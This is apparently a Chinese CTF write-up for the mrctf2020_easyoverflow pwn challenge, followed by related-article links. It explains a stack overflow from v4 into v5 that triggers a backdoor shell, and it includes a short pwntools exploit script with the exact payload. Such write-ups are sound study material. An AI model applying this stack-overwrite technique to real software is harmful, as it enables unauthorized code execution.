mrctf2020_easyoverflow

• 控制栈上参数
• 程序控制流

bamuwe@qianenzhao:~$ checksec mrctf2020_easyoverflow
[*] '/home/bamuwe/mrctf2020_easyoverflow'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

1. 保护全开,考虑利用程序自身的代码

2. 程序中存在后门,理解程序流

   关键在于check函数中,只要a1(v5) == fake_flag就可以得到shell

3. 通过ida可知v5在栈上的位置和fake_flag的内容

   

   

4. 构造payload通过填充v4的空间溢出到v5进而控制v5变量的内容

from pwn import *
io = process('./mrctf2020_easyoverflow')
#io = gdb.debug('./mrctf2020_easyoverflow')
payload = b'A'*48+b'n0t_r3@11y_f1@g\x00'
io.sendline(payload)
io.interactive()

本栏目推荐文章
• mrctf2020_easyoverflow
• CVE-2020-11800
• 【LeetCode 1635. Hopper 公司查询 I】with recursive生成2020年每月的最后一天
• 2020-2021 ACM-ICPC, Asia Seoul Regional Contest
• [ACTF2020 新生赛]Exec 1
• wustctf2020_getshell_2
• P6646 [CCO2020] Shopping Plans
• bjdctf_2020_router
• 题解 P7165 [COCI2020-2021#1] Papričice
• mrctf2020_shellcode

easyoverflow mrctf 2020easyoverflow mrctf 2020 mrctf 2020 ez_bypass bypass mrctf 2020 mrctf ezpop 2020 transform mrctf 2020 shellcode mrctf 2020 cyberpunk mrctf 2020 套路mrctf 2020 mrctf 2020 web easyoverflow